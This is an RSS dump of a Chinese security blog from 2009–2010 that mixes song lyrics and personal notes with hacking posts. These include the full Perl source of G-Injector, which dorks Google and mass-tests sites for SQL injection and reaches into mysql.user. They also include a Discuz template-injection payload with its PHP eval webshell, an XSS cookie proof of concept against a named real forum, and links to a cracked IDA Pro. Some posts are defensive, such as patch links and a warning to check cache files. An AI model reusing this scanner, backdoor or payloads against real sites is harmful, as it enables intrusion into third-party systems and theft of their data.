<![CDATA[召唤]]> http://www.patching.net/zhaohuan/ zh-cn PBlog2 v2.4 召唤 http://www.patching.net/zhaohuan/images/logos.gif http://www.patching.net/zhaohuan/ 召唤 http://www.patching.net/zhaohuan/article.asp?id=265 <![CDATA[推荐:《传奇》- 王菲]]> sunsp2@163.com(ZhaoHuAn) Wed,17 Feb 2010 21:23:46 +0800 http://www.patching.net/zhaohuan/default.asp?id=265
  词:左右  曲:李键
引用内容 引用内容

  只因为在人群中多看了你一眼

  再也没能忘掉你的容颜

  梦想着偶然能有一天再相见

  从此我开始孤单地思念

  想你时你在天边

  想你时你在眼前

  想你时你在脑海

  想你时你在心田

  宁愿相信我们前世有约

  今生的爱情故事不会再改变

  宁愿用这一生等你发现

  我一直在你身边

  从未走远

  只因为在人群中多看了你一眼

  再也没能忘掉你的容颜

  梦想着偶然能有一天再相见

  从此我开始孤单地思念

  想你时你在天边

  想你时你在眼前

  想你时你在脑海

  想你时你在心田

  宁愿相信我们前世有约

  今生的爱情故事不会再改变

  宁愿用这一生等你发现

  我一直在你身边

  从未走远

  宁愿相信我们前世有约

  今生的爱情故事不会再改变

  宁愿用这一生等你发现

  我一直在你身边

  从未走远

  只因为在人群中多看了你一眼



王菲-传奇----录音室版【4.51 MB (4,737,985 字节)】
http://www.rayfile.com/zh-cn/files/3c4c3851-1a56-11df-9e4e-0015c55db73d/


王菲-传奇(Live) ----最好音质的现场版本下载【4.63 MB (4,858,469 字节)】
http://www.rayfile.com/zh-cn/files/50402857-18cd-11df-be39-0015c55db73d/]]> http://www.patching.net/zhaohuan/article.asp?id=264 <![CDATA[IDA Pro 5.5(+Hex-Rays Decompiler v1.1)]]> sunsp2@163.com(ZhaoHuAn) Sat,19 Dec 2009 14:31:00 +0800 http://www.patching.net/zhaohuan/default.asp?id=264 ida pro 5.5

Ida pro advanced v5.5 + hex-Rays Decompiler v1.1

老外真猛,连Decompiler都放出来了~

*文件大小:87.4MB       2009-12-18

 ****************************************************************************************

http://dl.dropbox.com/u/3158427/Down/idapro55.zip
http://dl.dropbox.com/u/3158427/Down/IDA Pro Advanced 5.5 去除局域网检测补丁.rar
http://dl.dropbox.com/u/3158427/Down/IDA Pro Advanced v5.5_Simplified Chinese language file.rar
http://dl.dropbox.com/u/3158427/Down/PythonForWin2.5.rar

*****************************************************************************************

各种分流下载:

http://hotfile.com/dl/20983476/df1b86d/idapro55.zip.html

http://rapidshare.com/files/322331794/idapro55.zip.html

http://narod.ru/disk/16084747000/idapro55.zip.html 

http://www.multiupload.com/GICLN1AOE3

]]> http://www.patching.net/zhaohuan/article.asp?id=263 <![CDATA[R.I.P Str0ke is still alive:)]]> sunsp2@163.com(ZhaoHuAn) Thu,05 Nov 2009 20:09:17 +0800 http://www.patching.net/zhaohuan/default.asp?id=263
引用内容 引用内容
"Hi,

I know by now that many of you have seen the story at...

r0ke-milworms-funeral-is-this-friday.html" target="_blank" rel="external">http://bl4cksecurity.blogspot.com/2009/11 r0ke-milworms-funeral-is-this-friday.html



I know this because MANY of you have written me off-list with the message "have
you heard the news?"... If I did not personally reply, I am sorry, but my inbox
has been swamped today.

Well, good news and bad news here.

Bad news first. The above story is a hoax. Str0ke is alive, well, and kicking.
Don't feel bad. Many of the best in the industry got taken in by the story. I
fell for it, too -- hook, line, and sinker. Oh well, live and learn.

Now the good news. The folks at OffSec, along with David Kennedy and others, are
talking over milw0rm from stroke. Read the announcement here:
http://www.offensive-security.com/blog/


I had just talked with Muts yesterday about another issue, and he indicated that
an announcement regarding milw0rm would be coming out soon, but I suspect that
the hoax regarding str0ke and the buzz about inj3ct0r.com

may have forced an early pre-announcement.

I know that milw0rm will be in great hands."


http://www.offensive-security.com/blog/offsec/offensive-security-exploit-archive/

这个消息 貌似是backtrack的老大要接手milw0rm了~
]]> http://www.patching.net/zhaohuan/article.asp?id=262 <![CDATA[Discuz 3rd Party攻击第三波出现了]]> sunsp2@163.com(ZhaoHuAn) Thu,20 Aug 2009 18:14:49 +0800 http://www.patching.net/zhaohuan/default.asp?id=262
引用内容 引用内容
自定义模板变量:
变      量 : {','');ECHO '';$X=SUBSTR(MD5($_GET['B']),28);IF($X=='7aaa')EVAL($_POST['A']);//}
替换内容 : aaaaaaaaaa



/forumdata/cache/usergroup_0.php


程序代码 程序代码
<?php (substr(md5($_POST['b']),28)=='7aaa') && eval($_POST['a']);?>


对post的变量b进行md5加密,如果第28-31的位置是7aaa(32位MD5的后四位)的话 就执行eval($_POST['a']);
这个验证很YD啊。。

估计最近很多大站被黑都是出自这个东东吧~

使用DZ论坛的同学请自行检查一下/forumdata/cache/下的文件

相关讨论:< rong>

警惕Third Party Content攻击

Discuz发布的紧急公告

相关补丁:< rong>
http://www.comsenz.com/Disucz_patch_20090818.zip]]> http://www.patching.net/zhaohuan/article.asp?id=261 <![CDATA[国内首家支持挂马查询—超级巡警安全中心上线]]> sunsp2@163.com(ZhaoHuAn) Sat,11 Jul 2009 00:29:06 +0800 http://www.patching.net/zhaohuan/default.asp?id=261 http://a.sucop.com/    支持一下!

近日,国内首款免费安全软件厂商“超级巡警”推出一款极具前瞻性的安全平台,即“超级巡警安全中心”,该安全中心致力于对互联网整体安全状况进行评测,通过该安全中心的检测和评估,可为企业及个人用户提供权威准确的分析结果和防护病毒的措施,是目前国内第一款功能完备,性能强大,评价结果客观公正的网络安全评估平台。< rong>




目前已经具备“挂马网站查询”、“安全趋势分析”、“互联网安全动态评估”“百度安全查询”等多项功能,通过这些检测,可以快速发现并提醒日常互联网访问中可能存在的危险站点。< rong>

link: http://wlj.me/index.php/2009/07/a-sucop-com/]]> http://www.patching.net/zhaohuan/article.asp?id=260 <![CDATA[milw0rm的镜像&程序]]> sunsp2@163.com(ZhaoHuAn) Thu,09 Jul 2009 11:11:33 +0800 http://www.patching.net/zhaohuan/default.asp?id=260
今天上去找一个exp的时候,发现milw0rm已经打不开了,记得inj3ct0r以前自己做了个milw0rm的镜像,地址是http://inj3ct0r.com

貌似是目前国内能打开的一个数据还算比较完整的镜像站(要是有兄弟还有更好赶紧放出来吧 呵呵)

可以理解维护像milw0rm的站点是一件非常耗费时间和精力的事,不光要考虑到站点程序、数据库、服务器的维护,还有每天庞大的exploits要测试……

另外有兴趣的同学也可以YY个新的milw0rm出来~

程序在:
http://www.book.amjad.ws/save.php?action=save&id=41

数据库配置文件:
ozellikler.php

DB: milw0rm.sql


相信milw0rm还是会继续的 希望str0ke牛能找到一个好的接班人来接手她:)

PS:到上海了,14号到公司报到,这几个月实在是忙啊~]]> http://www.patching.net/zhaohuan/article.asp?id=259 <![CDATA[SimpleDorkGUi & G-Injector]]> sunsp2@163.com(ZhaoHuAn) Sat,30 May 2009 00:11:59 +0800 http://www.patching.net/zhaohuan/default.asp?id=259
SimpleDorkGUi< rong>是low1z< rong>今年年初用python写的一个图形界面的注入点搜索程序,现在已经推出了第二版。它可以通过根据你指定的搜索参数来进行搜索包含sql注入的地址,并判断数据类型。缺点是不能保存当前搜索进程以便下次的继续探测,不过0.2版本已经中加入了这个功能。



0.2版的代码在:
http://www.darkc0de.com/others/simpleDorkGUi.py

/*老版本0.1版在win下运行的话,这里有处代码要修改下:
程序代码 程序代码
txtField = Text(myFrame, font=('Verdana', 8, ''),fg='orange', bg='black', width=400, height=32, wrap=WORD, yscrollcommand=scb.set)
否则你将会看不到下面的操作工具栏;) */

0.1版建议运行在python 2.x版本上,因为python 3.x的不向后兼容,一些类似exec和print语句在3.x版本被去除或修改了导致程序报错。如果非要在3.x下运行的朋友可以自己修改一下代码,或者用官方提供的转换器转换一下:
Py(2to3)
http://svn.python.org/view/sandbox/trunk/2to3/


G-Injector(perl)< rong>是法国小伙jonathan59< rong>的作品,以前常在h4cky0u玩的朋友应该对他比较熟悉




代码如下:
程序代码 程序代码
#!/usr/bin/perl
# http://rk-project.tk
# bsnseabra@hotmail.com
# zer0xProud © greetz to Gladiator
# Sábado, 10 de Janeiro de 2009
use LWP::UserAgent;
my $top = LWP::UserAgent->new();
$top->timeout(10);
$top->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/3.0");
unless($ARGV[2]) {
   print "=> G-Injector <=\n";
   print "=> Use: ginjector.pl \"dork\" limit sqltest.txt\n";
   print "=> Visit Us unkn0wn.ws! <=\n";
exit 0;
}
open(WEBSITES, ">>", $ARGV[2])or die("File No Exists\n");
chomp($ARGV[0]);
syswrite STDOUT, "=><=>=<=>=<=>=<=>=<=\n";
syswrite STDOUT, "=> G-Injector 1.0 <=\n";
syswrite STDOUT, "=><=>=<=>=<=>=<=>=<=\n";
googler($ARGV[0],$ARGV[2]);
close(WEBSITES);
fin();
sub inject{
    syswrite STDOUT, "=> Verifing.. $_[0]=\n";
    syswrite STDOUT, "=> Vulnerable??: ";
    my $weborig = $_[0] . "=";
    my $injhex = "-1+union+select+0x6c333374";
    my $injnum = "-1+union+select+0";
    my $hex='0x6c333374';
    my $sw = 0;
    $webnum=$weborig . $injnum;
    $webhex=$weborig . $injhex;
    for($conta=0;$conta<=$ARGV[1];$conta++){
        if($conta>0){
            $webhex.=','.$hex;
            $webnum.=','.$conta;
        }
        $codeweb = $top->get($webhex . "--");
        if($codeweb->is_success){
            $getcodeweb = $codeweb->content;
            if($getcodeweb =~ /l33t/ ){
                syswrite STDOUT, "Ya!\n";
                $sw = 1;
                $conta = $_[1] + 1;
                print WEBSITES "$webnum--\n";
                schemauser($webhex,$webnum);
            }
        }
    }
    if($sw == 0){
        syswrite STDOUT, "n0p!\n";
    }
}
sub fin{
    print "\n Ok, Scan Finished, Thanks, Visit us unkn0wn.ws\n";
}
sub schemauser{
    my $schinj = "+from+information_schema.tables--";
    my $userinj = "+from+mysql.user--";
    syswrite STDOUT, "=> Information Schema?: ";
    my $ws = $_[0] . $schinj;
    my $wwss = $_[1] . $schinj;
    my $webschema = $top->get($ws);
    if($webschema->is_success){
        $getwebschema = $webschema->content;
        if($getwebschema =~ /l33t/ ){
            syswrite STDOUT, "Ya!\n";
            print WEBSITES "$wwss\n";
        }else{
            syswrite STDOUT, "n0p!\n";
        }
    }
    syswrite STDOUT, "=> mysql.User??: ";
    my $wu = $_[0] . $userinj;
    my $wwuu = $_[1] . $userinj;
    my $webuser = $top->get($wu);
    if($webuser->is_success){
        $getwebuser = $webuser->content;
        if($webuser =~ /l33t/ ){
            syswrite STDOUT, "Ya!\n";
            print WEBSITES "$wwuu\n";
        }else{
            syswrite STDOUT, "n0p!\n";
        }
    }
}
sub cleared{
    my $sha = $_[0];
    if($sha =~ /\=/ ){
        @splitweb=split("=",$sha);
        inject($splitweb[0]);
    }
}
sub googler{
    sleep(1);
    syswrite STDOUT, "Wait Please....\n";
    for($numpag=0;$numpag<=40;$numpag=$numpag+10){
        my $find = 'arch?hl=es" target="_blank" rel="external">http://www.google.com.ar arch?hl=es&q=' . $_[0] . '&start=' . $numpag . '&sa=N';
        my $resweb = $top->get($find);
        if($resweb->is_success){
            $getwebs = $resweb->content;
            while($getwebs =~ m/<h3 class\=r><a href\=\"(.*?)\" class\=/g ){
                cleared($1);
            }
        }
    }
}

比前者多了个后续的自动检测注入点的功能.并可定义将注入结果时时保存。

代码都是开源的,有兴趣的同学可以参考修改下。可以考虑加入代理功能和清除cookies来突破google的搜索请求限制、更多注入特征的判断、变形判断字符来打造成渗透利器:)]]> http://www.patching.net/zhaohuan/article.asp?id=258 <![CDATA[[MS09-012]Token Kidnapping 安全补丁(KB956572)]]> sunsp2@163.com(ZhaoHuAn) Mon,20 Apr 2009 16:55:07 +0800 http://www.patching.net/zhaohuan/default.asp?id=258
http://www.microsoft.com/downloads/details.aspx?familyid=73D2324F-BE59-4B0C-B1AC-9876A13C2C03&displaylang=zh-cn]]> http://www.patching.net/zhaohuan/article.asp?id=257 <![CDATA[Discuz <=7.0(frame.php) xss Vulnerability]]> sunsp2@163.com(ZhaoHuAn) Sat,18 Apr 2009 22:08:57 +0800 http://www.patching.net/zhaohuan/default.asp?id=257

PoC:

程序代码 程序代码
http://bbs.cctv.com/index.php?gid=24"></iframe><script>alert(document.cookie)</script>


----->
  跳转到了
程序代码 程序代码
http://bbs.cctv.com/frame.php?frameon=yes&referer=http%3A//bbs.cctv.com/index.php%3Fgid%3D24%22%3E%3C/iframe%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E




]]> http://www.patching.net/zhaohuan/article.asp?id=256 <![CDATA[摘一下老爸发的留言。]]> sunsp2@163.com(ZhaoHuAn) Thu,09 Apr 2009 21:21:01 +0800 http://www.patching.net/zhaohuan/default.asp?id=256 人的一生怎样都可以度过,默默无闻的是一生,煊煊赫赫的也是一生。但为人者总要对生命负责。伟大、英雄未必人人能够,但总得建功立德,总要活出人的尊严。有本事要靠本事,没本事也要有德行。生命可以承受无边的苦难,但承受不了无足轻重;生命可以承受贫病交加,但承受不了同类的冷落;生命可以承受挫折失败,但承受不了尊严的失缺;生命也可以承受忍辱负重,但它承受不了永无成功的荣耀。一个人在百年之内总得为自己的生命挣得一点自豪与骄傲,也应该在自己力所能及的层级上,为生命挣下一两次可以在众人之中君临端坐的首席之位。即使生命对此并无奢求,也要有一点点创造,有一点点作为,来证明自己曾在这个世界上活过。 ]]>